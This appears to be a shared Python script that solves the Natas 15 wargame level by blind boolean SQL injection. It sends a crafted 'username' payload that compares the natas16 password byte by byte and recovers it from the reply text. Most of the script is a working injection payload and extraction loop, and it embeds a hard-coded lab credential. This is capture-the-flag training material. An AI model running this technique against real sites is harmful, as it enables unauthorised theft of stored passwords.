
@Creased
Last active December 4, 2017 21:37
Natas 16
import requests
import re
import sys
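# Blind boolean extraction against the Natas level 15 lab page.
#
# The script sends one POST per (position, candidate byte) pair and treats the
# literal reply text "This user exists." as the "condition is true" signal.
# NOTE(review): this only works because the endpoint appears to interpolate
# the `username` field into a double-quoted SQL string; a parameterized query
# would treat the whole value as data and remove the true/false signal.

# HTTP headers
# The Authorization value is a hard-coded Basic credential (base64 of
# user:password) for the lab level, and the URL below is plain HTTP, so it
# travels unencrypted. Outside a lab, load credentials from the environment.
headers = {
    'Authorization': 'Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==',
    'Accept-Language': 'en'
}

# Config
length = 1024  # Upper bound on the password length (the loop stops earlier)
found = False  # Set once the whole string has been recovered
position = 1  # 1-based position of the character under test
char = 0  # Candidate byte value for the current position
final = ''  # Characters recovered so far

while not found:
    data = {
        'username': 'natas16" AND ASCII(SUBSTRING(users.password,{position},1))={char} AND "a"="a'.format(position=position, char=char)
    }
    # A timeout keeps a stalled connection from hanging the script forever.
    response = requests.post(
        'http://natas15.natas.labs.overthewire.org/index.php',
        data=data,
        headers=headers,
        timeout=10
    )
    # Fail fast on 401/5xx instead of reading an error page as "no match",
    # which would otherwise spin the candidate counter without end.
    response.raise_for_status()
    # Plain substring test: the marker is literal text, not a regex.
    result = 'This user exists.' in response.text

    if result:
        if char == 0:
            # Byte value 0 matched: the script reads this as "past the end of
            # the string", so stop here without appending a NUL to the result.
            found = True
        else:
            final += chr(char)
            print(final)  # Print progress
            if position == length:
                found = True  # Reached the configured maximum length
            else:
                position += 1  # Move to the next character
                char = 0  # Restart the candidate counter
    elif char < 255:
        char += 1  # No match, try the next candidate
    else:
        # ASCII() yields a single byte value, so nothing above 255 can match;
        # a full miss means the signal is not working (wrong marker text,
        # changed page, filtered request) rather than an unusual character.
        sys.exit('No candidate matched at position {}; aborting.'.format(position))

print(repr('Flag: {}'.format(final)))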